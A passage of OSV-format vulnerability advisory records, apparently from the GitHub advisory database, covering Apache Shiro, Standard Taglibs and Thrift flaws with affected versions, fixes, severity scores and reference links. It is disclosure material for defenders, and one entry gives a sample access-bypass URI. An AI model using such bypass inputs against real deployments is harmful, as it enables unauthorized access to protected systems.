"org.apache.shiro:shiro-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.shiro/shiro-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.2.5" } ] } ], "versions": [ "1.0.0-incubating", "1.1.0", "1.2.0", "1.2.1", "1.2.2", "1.2.3", "1.2.4" ], "database_specific": { "last_known_affected_version_range": "\u003c= 1.2.4", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-p836-389h-j692/GHSA-p836-389h-j692.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2016-4437" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ef3a800c7d727a00e04b78e2f06c5cd8960f09ca28c9b69d94c3c4c4%40%3Cannouncements.aurora.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ef3a800c7d727a00e04b78e2f06c5cd8960f09ca28c9b69d94c3c4c4@%3Cannouncements.aurora.apache.org%3E" }, { "type": "WEB", "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2016-4437" }, { "type": "WEB", "url": "http://packetstormsecurity.com/files/137310/Apache-Shiro-1.2.4-Information-Disclosure.html" }, { "type": "WEB", "url": "http://packetstormsecurity.com/files/157497/Apache-Shiro-1.2.4-Remote-Code-Execution.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2016-2035.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2016-2036.html" }, { "type": "WEB", "url": "http://www.securityfocus.com/archive/1/538570/100/0/threaded" }, { "type": "WEB", "url": "http://www.securityfocus.com/bid/91024" } ], "database_specific": { "cwe_ids": [ "CWE-284", "CWE-321" ], "github_reviewed": true, "github_reviewed_at": "2022-07-06T19:56:32Z", "nvd_published_at": "2016-06-07T14:06:00Z", "severity": "CRITICAL" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-r679-m633-g7wc", "published": "2020-02-04T22:36:36Z", "modified": "2024-12-05T05:38:38.036634Z", "aliases": [ "CVE-2019-12422" ], "summary": "Improper input validation in Apache Shiro", "details": "Apache Shiro before 1.4.2, when using the default \"remember me\" configuration, cookies could be susceptible to a padding attack.", "affected": [ { "package": { "name": "org.apache.shiro:shiro-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.shiro/shiro-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.4.2" } ] } ], "versions": [ "1.0.0-incubating", "1.1.0", "1.2.0", "1.2.1", "1.2.2", "1.2.3", "1.2.4", "1.2.5", "1.2.6", "1.3.0", "1.3.1", "1.3.2", "1.4.0", "1.4.0-RC2", "1.4.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/02/GHSA-r679-m633-g7wc/GHSA-r679-m633-g7wc.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-12422" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/c9db14cfebfb8e74205884ed2bf2e2b30790ce24b7dde9191c82572c@%3Cdev.shiro.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2d2612c034ab21a3a19d2132d47d3e4aa70105008dd58af62b653040@%3Ccommits.shiro.apache.org%3E" } ], "database_specific": { "cwe_ids": [], "github_reviewed": true, "github_reviewed_at": "2020-02-04T21:49:59Z", "nvd_published_at": "2019-11-18T23:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-3jx9-mgwx-4q83", "published": "2022-05-14T02:42:51Z", "modified": "2024-12-04T05:51:17.893997Z", "aliases": [ "CVE-2010-3863" ], "summary": "Apache Shiro Path Traversal vulnerability", "details": "Apache Shiro before 1.1.0, and JSecurity 0.9.x, does not canonicalize URI paths before comparing them to entries in the shiro.ini file, which allows remote attackers to bypass intended access restrictions via a crafted request, as demonstrated by the /./account/index.jsp URI.", "affected": [ { "package": { "name": "org.apache.shiro:shiro-root", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.shiro/shiro-root" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.1.0" } ] } ], "versions": [ "1.0.0-incubating" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-3jx9-mgwx-4q83/GHSA-3jx9-mgwx-4q83.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2010-3863" }, { "type": "WEB", "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/62959" }, { "type": "PACKAGE", "url": "https://github.com/apache/shiro" }, { "type": "WEB", "url": "https://web.archive.org/web/20101120091718/http://www.vupen.com/english/advisories/2010/2888" }, { "type": "WEB", "url": "https://web.archive.org/web/20101129043410/http://secunia.com/advisories/41989" }, { "type": "WEB", "url": "https://web.archive.org/web/20110929165859/http://www.securityfocus.com/bid/44616" }, { "type": "WEB", "url": "https://web.archive.org/web/20161017000748/http://www.securityfocus.com/archive/1/514616/100/0/threaded" }, { "type": "WEB", "url": "http://archives.neohapsis.com/archives/fulldisclosure/2010-11/0020.html" } ], "database_specific": { "cwe_ids": [ "CWE-22" ], "github_reviewed": true, "github_reviewed_at": "2024-02-07T22:57:26Z", "nvd_published_at": "2010-11-05T17:00:00Z", "severity": "MODERATE" } }, { "schema_version": "1.7.3", "id": "GHSA-7cxr-h8wm-fg4c", "published": "2023-01-14T12:30:23Z", "modified": "2024-02-16T08:23:48.417435Z", "aliases": [ "CVE-2023-22602" ], "summary": "Apache Shiro Interpretation Conflict vulnerability", "details": "When using Apache Shiro before 1.11.0 together with Spring Boot 2.6+, a specially crafted HTTP request may cause an authentication bypass. The authentication bypass occurs when Shiro and Spring Boot are using different pattern-matching techniques. Both Shiro and Spring Boot \u003c 2.6 default to Ant style pattern matching. Mitigation: Update to Apache Shiro 1.11.0, or set the following Spring Boot configuration value: `spring.mvc.pathmatch.matching-strategy = ant_path_matcher` ", "affected": [ { "package": { "name": "org.apache.shiro:shiro-root", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.shiro/shiro-root" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.11.0" } ] } ], "versions": [ "1.0.0-incubating", "1.1.0", "1.10.0", "1.10.1", "1.2.0", "1.2.1", "1.2.2", "1.2.3", "1.2.4", "1.2.5", "1.2.6", "1.3.0", "1.3.1", "1.3.2", "1.4.0", "1.4.0-RC2", "1.4.1", "1.4.2", "1.5.0", "1.5.1", "1.5.2", "1.5.3", "1.6.0", "1.7.0", "1.7.1", "1.8.0", "1.9.0", "1.9.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/01/GHSA-7cxr-h8wm-fg4c/GHSA-7cxr-h8wm-fg4c.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-22602" }, { "type": "PACKAGE", "url": "https://github.com/apache/shiro" }, { "type": "WEB", "url": "https://lists.apache.org/thread/dzj0k2smpzzgj6g666hrbrgsrlf9yhkl" } ], "database_specific": { "cwe_ids": [ "CWE-436" ], "github_reviewed": true, "github_reviewed_at": "2023-01-20T21:50:25Z", "nvd_published_at": "2023-01-14T10:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-4q2v-j639-cp7p", "published": "2022-05-14T02:46:12Z", "modified": "2023-11-08T03:58:33.527856Z", "aliases": [ "CVE-2016-6802" ], "summary": "Improper Access Control in Apache Shiro", "details": "Apache Shiro before 1.3.2 allows attackers to bypass intended servlet filters and gain access by leveraging use of a non-root servlet context path.", "affected": [ { "package": { "name": "org.apache.shiro:shiro-all", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.shiro/shiro-all" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.3.2" } ] } ], "versions": [ "1.0.0-incubating", "1.1.0", "1.2.0", "1.2.1", "1.2.2", "1.2.3", "1.2.4", "1.2.5", "1.2.6", "1.3.0", "1.3.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-4q2v-j639-cp7p/GHSA-4q2v-j639-cp7p.json" } }, { "package": { "name": "org.apache.shiro:shiro-web", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.shiro/shiro-web" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.3.2" } ] } ], "versions": [ "1.0.0-incubating", "1.1.0", "1.2.0", "1.2.1", "1.2.2", "1.2.3", "1.2.4", "1.2.5", "1.2.6", "1.3.0", "1.3.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-4q2v-j639-cp7p/GHSA-4q2v-j639-cp7p.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2016-6802" }, { "type": "WEB", "url": "https://github.com/apache/shiro/commit/b15ab927709ca18ea4a02538be01919a19ab65af" }, { "type": "WEB", "url": "https://issues.apache.org/jira/browse/SHIRO-584" }, { "type": "WEB", "url": "https://packetstormsecurity.com/files/138709/Apache-Shiro-Filter-Bypass.html" } ], "database_specific": { "cwe_ids": [ "CWE-284" ], "github_reviewed": true, "github_reviewed_at": "2022-11-04T22:45:53Z", "nvd_published_at": "2016-09-20T19:59:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-hhw5-c326-822h", "published": "2023-12-14T09:30:19Z", "modified": "2025-11-04T17:06:07.324210Z", "aliases": [ "CVE-2023-46750" ], "summary": "Open redirect in Apache Shiro", "details": "URL Redirection to Untrusted Site ('Open Redirect') vulnerability when \"form\" authentication is used in Apache Shiro.\nMitigation: Update to Apache Shiro 1.13.0+ or 2.0.0-alpha-4+.", "affected": [ { "package": { "name": "org.apache.shiro:shiro-web", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.shiro/shiro-web" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.13.0" } ] } ], "versions": [ "1.0.0-incubating", "1.1.0", "1.10.0", "1.10.1", "1.11.0", "1.12.0", "1.2.0", "1.2.1", "1.2.2", "1.2.3", "1.2.4", "1.2.5", "1.2.6", "1.3.0", "1.3.1", "1.3.2", "1.4.0", "1.4.0-RC2", "1.4.1", "1.4.2", "1.5.0", "1.5.1", "1.5.2", "1.5.3", "1.6.0", "1.7.0", "1.7.1", "1.8.0", "1.9.0", "1.9.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/12/GHSA-hhw5-c326-822h/GHSA-hhw5-c326-822h.json" } }, { "package": { "name": "org.apache.shiro:shiro-web", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.shiro/shiro-web" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.0.0-alpha-1" }, { "fixed": "2.0.0-alpha-4" } ] } ], "versions": [ "2.0.0-alpha-1", "2.0.0-alpha-2", "2.0.0-alpha-3" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/12/GHSA-hhw5-c326-822h/GHSA-hhw5-c326-822h.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-46750" }, { "type": "WEB", "url": "https://github.com/apache/shiro/commit/3b80f5c8e5a95ba31e92e4825ecc0ba3148b555a" }, { "type": "WEB", "url": "https://github.com/apache/shiro/commit/8400d08d5eac0bc4fae99d28c5adc82dd8a86eda" }, { "type": "PACKAGE", "url": "https://github.com/apache/shiro" }, { "type": "WEB", "url": "https://lists.apache.org/thread/hoc9zdyzmmrfj1zhctsvvtx844tcq6w9" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20240808-0002" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20241108-0002" } ], "database_specific": { "cwe_ids": [ "CWE-601" ], "github_reviewed": true, "github_reviewed_at": "2023-12-15T03:11:05Z", "nvd_published_at": "2023-12-14T09:15:42Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-pmhc-2g4f-85cg", "published": "2023-07-24T21:30:39Z", "modified": "2025-02-13T19:12:43.466421Z", "aliases": [ "CVE-2023-34478" ], "summary": "Path Traversal in Apache Shiro", "details": "Apache Shiro, before 1.12.0 or 2.0.0-alpha-3, may be susceptible to a path traversal attack that results in an authentication bypass when used together with APIs or other web frameworks that route requests based on non-normalized requests.\n\nMitigation: Update to Apache Shiro 1.12.0+ or 2.0.0-alpha-3+", "affected": [ { "package": { "name": "org.apache.shiro:shiro-web", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.shiro/shiro-web" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.12.0" } ] } ], "versions": [ "1.0.0-incubating", "1.1.0", "1.10.0", "1.10.1", "1.11.0", "1.2.0", "1.2.1", "1.2.2", "1.2.3", "1.2.4", "1.2.5", "1.2.6", "1.3.0", "1.3.1", "1.3.2", "1.4.0", "1.4.0-RC2", "1.4.1", "1.4.2", "1.5.0", "1.5.1", "1.5.2", "1.5.3", "1.6.0", "1.7.0", "1.7.1", "1.8.0", "1.9.0", "1.9.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/07/GHSA-pmhc-2g4f-85cg/GHSA-pmhc-2g4f-85cg.json" } }, { "package": { "name": "org.apache.shiro:shiro-web", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.shiro/shiro-web" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.0.0-alpha-1" }, { "fixed": "2.0.0-alpha-3" } ] } ], "versions": [ "2.0.0-alpha-1", "2.0.0-alpha-2" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/07/GHSA-pmhc-2g4f-85cg/GHSA-pmhc-2g4f-85cg.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-34478" }, { "type": "WEB", "url": "https://github.com/apache/shiro/commit/c3ede3f94efb442acb0795714a022c2c121d1da0" }, { "type": "PACKAGE", "url": "https://github.com/apache/shiro" }, { "type": "WEB", "url": "https://lists.apache.org/thread/mbv26onkgw9o35rldh7vmq11wpv2t2qk" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20230915-0005" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2023/07/24/4" } ], "database_specific": { "cwe_ids": [ "CWE-22" ], "github_reviewed": true, "github_reviewed_at": "2023-07-25T13:51:45Z", "nvd_published_at": "2023-07-24T19:15:10Z", "severity": "CRITICAL" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-v98j-7crc-wvrj", "published": "2022-02-09T22:03:57Z", "modified": "2023-11-08T04:02:42.580112Z", "aliases": [ "CVE-2020-17523" ], "summary": "Authentication bypass in Apache Shiro", "details": "Apache Shiro before 1.7.1, when using Apache Shiro with Spring, a specially crafted HTTP request may cause an authentication bypass.", "affected": [ { "package": { "name": "org.apache.shiro:shiro-web", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.shiro/shiro-web" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.7.1" } ] } ], "versions": [ "1.0.0-incubating", "1.1.0", "1.2.0", "1.2.1", "1.2.2", "1.2.3", "1.2.4", "1.2.5", "1.2.6", "1.3.0", "1.3.1", "1.3.2", "1.4.0", "1.4.0-RC2", "1.4.1", "1.4.2", "1.5.0", "1.5.1", "1.5.2", "1.5.3", "1.6.0", "1.7.0" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/02/GHSA-v98j-7crc-wvrj/GHSA-v98j-7crc-wvrj.json" } }, { "package": { "name": "org.apache.shiro:shiro-spring", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.shiro/shiro-spring" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.7.1" } ] } ], "versions": [ "1.0.0-incubating", "1.1.0", "1.2.0", "1.2.1", "1.2.2", "1.2.3", "1.2.4", "1.2.5", "1.2.6", "1.3.0", "1.3.1", "1.3.2", "1.4.0", "1.4.0-RC2", "1.4.1", "1.4.2", "1.5.0", "1.5.1", "1.5.2", "1.5.3", "1.6.0", "1.7.0" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/02/GHSA-v98j-7crc-wvrj/GHSA-v98j-7crc-wvrj.json" } }, { "package": { "name": "org.apache.shiro:shiro-spring-boot-starter", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.shiro/shiro-spring-boot-starter" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.7.1" } ] } ], "versions": [ "1.4.0", "1.4.0-RC2", "1.4.1", "1.4.2", "1.5.0", "1.5.1", "1.5.2", "1.5.3", "1.6.0", "1.7.0" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/02/GHSA-v98j-7crc-wvrj/GHSA-v98j-7crc-wvrj.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-17523" }, { "type": "WEB", "url": "https://github.com/apache/shiro/pull/263" }, { "type": "WEB", "url": "https://issues.apache.org/jira/browse/SHIRO-797" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r5b93ddf97e2c4cda779d22fab30539bdec454cfa5baec4ad0ffae235@%3Cgitbox.activemq.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r679ca97813384bdb1a4c087810ba44d9ad9c7c11583979bb7481d196@%3Cdev.shiro.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r8244fd0831db894d5e89911ded9c72196d395a90ae655414d23ed0dd@%3Cusers.activemq.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r852971e28f54cafa7d325bd7033115c67d613b112a2a1076817390ac@%3Cdev.shiro.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9d93dfb5df016b1a71a808486bc8f9fbafebbdbc8533625f91253f1d@%3Cdev.shiro.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rce5943430a6136d37a1f2fc201d245fe094e2727a0bc27e3b2d43a39%40%3Cdev.shiro.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd4b613e121438b97e3eb263cac3137caddb1dbd8f648b73a4f1898a6@%3Cissues.activemq.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re25b8317b00a50272a7252c4552cf1a81a97984cc2111ef7728e48e0@%3Cdev.shiro.apache.org%3E" }, { "type": "WEB", "url": "http://shiro.apache.org/download.html" } ], "database_specific": { "cwe_ids": [ "CWE-287" ], "github_reviewed": true, "github_reviewed_at": "2021-04-05T21:20:26Z", "nvd_published_at": "2021-02-03T17:15:00Z", "severity": "CRITICAL" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-6x4w-8w53-xrvv", "published": "2020-09-14T18:44:01Z", "modified": "2024-12-02T06:03:30.310261Z", "aliases": [ "CVE-2015-0254" ], "summary": "XXE in Apache Standard Taglibs", "details": "Apache Standard Taglibs before 1.2.3 allows remote attackers to execute arbitrary code or conduct external XML entity (XXE) attacks via a crafted XSLT extension in a (1) \u003cx:parse\u003e or (2) \u003cx:transform\u003e JSTL XML tag.", "affected": [ { "package": { "name": "org.apache.taglibs:taglibs-standard", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.taglibs/taglibs-standard" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.2.3" } ] } ], "versions": [ "1.2.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/09/GHSA-6x4w-8w53-xrvv/GHSA-6x4w-8w53-xrvv.json" } }, { "package": { "name": "org.apache.taglibs:taglibs-standard-impl", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.taglibs/taglibs-standard-impl" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.2.3" } ] } ], "versions": [ "1.2.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/09/GHSA-6x4w-8w53-xrvv/GHSA-6x4w-8w53-xrvv.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2015-0254" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2016:1376" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/8a20e48acb2a40be5130df91cf9d39d8ad93181989413d4abcaa4914@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/f8e0814e11c7f21f42224b6de111cb3f5e5ab5c15b78924c516d4ec2@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6c93d8ade3788dbc00f5a37238bc278e7d859f2446b885460783a16f@%3Cpluto-dev.portals.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc1686f6196bb9063bf26577a21b8033c19c1a30e5a9159869c8f3d38@%3Cpluto-dev.portals.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re3b72cbb13e1dfe85c4a06959a3b6ca6d939b407ecca80db12b54220@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf1179e6971bc46f0f68879a9a10cc97ad4424451b0889aeef04c8077@%3Cpluto-scm.portals.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rfc2bfd99c340dafd501676693cd889c1f9f838b97bdd0776a8f5557d@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2020.html" }, { "type": "WEB", "url": "http://lists.opensuse.org/opensuse-updates/2015-10/msg00033.html" }, { "type": "WEB", "url": "http://mail-archives.apache.org/mod_mbox/tomcat-taglibs-user/201502.mbox/%3C82207A16-6348-4DEE-877E-F7B87292576A%40apache.org%3E" }, { "type": "WEB", "url": "http://packetstormsecurity.com/files/130575/Apache-Standard-Taglibs-1.2.1-XXE-Remote-Command-Execution.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2015-1695.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2016-1838.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2016-1839.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2016-1840.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2016-1841.html" }, { "type": "WEB", "url": "http://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html" }, { "type": "WEB", "url": "http://www.securityfocus.com/archive/1/534772/100/0/threaded" }, { "type": "WEB", "url": "http://www.securityfocus.com/bid/72809" }, { "type": "WEB", "url": "http://www.securitytracker.com/id/1034934" }, { "type": "WEB", "url": "http://www.ubuntu.com/usn/USN-2551-1" } ], "database_specific": { "cwe_ids": [ "CWE-611" ], "github_reviewed": true, "github_reviewed_at": "2020-09-14T18:42:48Z", "nvd_published_at": "2015-03-09T14:59:00Z", "severity": "HIGH" } }, { "schema_version": "1.7.3", "id": "GHSA-6x4w-8w53-xrvv", "published": "2020-09-14T18:44:01Z", "modified": "2024-12-02T06:03:30.310261Z", "aliases": [ "CVE-2015-0254" ], "summary": "XXE in Apache Standard Taglibs", "details": "Apache Standard Taglibs before 1.2.3 allows remote attackers to execute arbitrary code or conduct external XML entity (XXE) attacks via a crafted XSLT extension in a (1) \u003cx:parse\u003e or (2) \u003cx:transform\u003e JSTL XML tag.", "affected": [ { "package": { "name": "org.apache.taglibs:taglibs-standard", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.taglibs/taglibs-standard" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.2.3" } ] } ], "versions": [ "1.2.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/09/GHSA-6x4w-8w53-xrvv/GHSA-6x4w-8w53-xrvv.json" } }, { "package": { "name": "org.apache.taglibs:taglibs-standard-impl", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.taglibs/taglibs-standard-impl" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.2.3" } ] } ], "versions": [ "1.2.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/09/GHSA-6x4w-8w53-xrvv/GHSA-6x4w-8w53-xrvv.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2015-0254" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2016:1376" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/8a20e48acb2a40be5130df91cf9d39d8ad93181989413d4abcaa4914@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/f8e0814e11c7f21f42224b6de111cb3f5e5ab5c15b78924c516d4ec2@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6c93d8ade3788dbc00f5a37238bc278e7d859f2446b885460783a16f@%3Cpluto-dev.portals.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc1686f6196bb9063bf26577a21b8033c19c1a30e5a9159869c8f3d38@%3Cpluto-dev.portals.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re3b72cbb13e1dfe85c4a06959a3b6ca6d939b407ecca80db12b54220@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf1179e6971bc46f0f68879a9a10cc97ad4424451b0889aeef04c8077@%3Cpluto-scm.portals.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rfc2bfd99c340dafd501676693cd889c1f9f838b97bdd0776a8f5557d@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2020.html" }, { "type": "WEB", "url": "http://lists.opensuse.org/opensuse-updates/2015-10/msg00033.html" }, { "type": "WEB", "url": "http://mail-archives.apache.org/mod_mbox/tomcat-taglibs-user/201502.mbox/%3C82207A16-6348-4DEE-877E-F7B87292576A%40apache.org%3E" }, { "type": "WEB", "url": "http://packetstormsecurity.com/files/130575/Apache-Standard-Taglibs-1.2.1-XXE-Remote-Command-Execution.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2015-1695.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2016-1838.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2016-1839.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2016-1840.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2016-1841.html" }, { "type": "WEB", "url": "http://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html" }, { "type": "WEB", "url": "http://www.securityfocus.com/archive/1/534772/100/0/threaded" }, { "type": "WEB", "url": "http://www.securityfocus.com/bid/72809" }, { "type": "WEB", "url": "http://www.securitytracker.com/id/1034934" }, { "type": "WEB", "url": "http://www.ubuntu.com/usn/USN-2551-1" } ], "database_specific": { "cwe_ids": [ "CWE-611" ], "github_reviewed": true, "github_reviewed_at": "2020-09-14T18:42:48Z", "nvd_published_at": "2015-03-09T14:59:00Z", "severity": "HIGH" } }, { "schema_version": "1.7.3", "id": "GHSA-g2fg-mr77-6vrm", "published": "2021-03-12T21:33:55Z", "modified": "2024-03-15T05:31:48.921973Z", "aliases": [ "CVE-2020-13949" ], "related": [ "CGA-3pv7-5j5f-w8rx", "CGA-7fjw-8fvm-77hc" ], "summary": "Uncontrolled Resource Consumption in Apache Thrift", "details": "In Apache Thrift 0.9.3 to 0.13.0, malicious RPC clients could send short messages which would result in a large memory allocation, potentially leading to denial of service.", "affected": [ { "package": { "name": "org.apache.thrift:libthrift", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.thrift/libthrift" }, "ranges": [ { "type": 